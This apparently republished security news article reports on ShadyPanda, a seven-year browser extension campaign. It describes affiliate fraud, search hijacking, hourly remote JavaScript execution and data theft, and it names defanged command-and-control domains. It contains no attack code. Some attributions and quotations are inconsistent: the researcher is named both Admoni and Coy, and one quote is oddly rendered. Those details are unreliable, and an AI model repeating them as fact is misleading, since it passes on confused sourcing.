The threat actor known as ShadyPanda has been involved in a seven-year browser extension campaign that has resulted in over 4.3 million installs.
According to a report by Koui Security, five of these extensions started as legitimate programs and introduced malicious changes in mid-2024, garnering 300,000 installations. These extensions have since been removed.
“These extensions are currently performing remote code execution every hour, downloading and executing arbitrary JavaScript with full browser access,” security researcher Tuval Admoni said in a report shared with The Hacker News. “They monitor every website visit, steal encrypted browsing history, and collect complete browser fingerprints.”
To make matters worse, one of the extensions, Clean Master, was picked up and verified by Google at some point. This trust-building exercise allowed the attackers to expand their user base and silently issue malicious updates years later without arousing any suspicion.
Meanwhile, another set of five add-ons from the same publisher is designed to monitor every URL a user visits, record search engine queries and mouse clicks, and send that information to a server located in China. These extensions have been installed approximately 4 million times, with WeTab alone accounting for 3 million installs.
Early signs of malicious activity were said to have been observed in 2023, when 20 extensions were published on the Chrome Web Store and 125 extensions on Microsoft Edge by developers named “nuggetsno15” and “rocket Zhang,” respectively. All identified extensions were masquerading as wallpapers or productivity apps.
These extensions have been found to engage in affiliate fraud by secretly injecting tracking codes when users visit eBay, Booking.com, or Amazon to generate illegal commissions from users’ purchases. In early 2024, attacks moved from seemingly benign injections to active browser control by redirecting search queries, harvesting search queries, and extracting cookies from specific domains.
“All web searches were redirected through trovi.com, a known browser hijacker,” Coy said. “Search queries are recorded, monetized, and sold. Search results are manipulated for profit.”
At some point in mid-2024, five extensions (three of which had been working legally for years) were modified to distribute malicious updates that introduced backdoor-like functionality by checking the domain “api.extensionplay.”[.]com” every hour to retrieve and execute a JavaScript payload.
The payload is designed to monitor all visits to the website and send the data in encrypted format to ShadyPanda servers (“api.cleanmasters”).[.]In addition to using extensive obfuscation to hide its functionality, it also switches the browser to benign behavior when you attempt to access the browser’s developer tools.
Additionally, extensions can launch man-in-the-middle (AitM) attacks to facilitate credential theft, session hijacking, and arbitrary code injection into websites.
This activity moved into its final phase when five other extensions, including WeTab, published to the Microsoft Edge Add-on Hub around 2023, leveraged its huge installed base to enable comprehensive monitoring of all visited URLs, search queries, mouse clicks, cookies, browser fingerprint collection, and more.
It also has the ability to collect information about how victims interact with web pages, such as web page viewing time and scrolling behavior. The WeTab extension is still available for download as of this writing.
The findings provide a complete picture of an ongoing campaign that occurred over four distinct phases, gradually transforming browser extensions from legitimate tools to data-gathering spyware. However, it is worth noting that it is not clear whether the attackers artificially inflated the download numbers to create an illusion of legitimacy.
We recommend that users who have installed the extension remove the extension immediately and rotate their credentials out of an abundance of caution.
“The automatic update mechanism designed to keep users safe became an attack vector,” Coy said. “Chrome and Edge’s trusted update pipeline delivered malware to users silently. No phishing, no social engineering, just trusted extensions with silent version bumps that turn a productivity tool into a monitoring platform.”
“ShadyPanda’s success goes beyond technical sophistication; it has systematically exploited the same vulnerability for seven years. The marketplace reviews extensions at the time of submission; we do not monitor what happens after approval.”
Source link
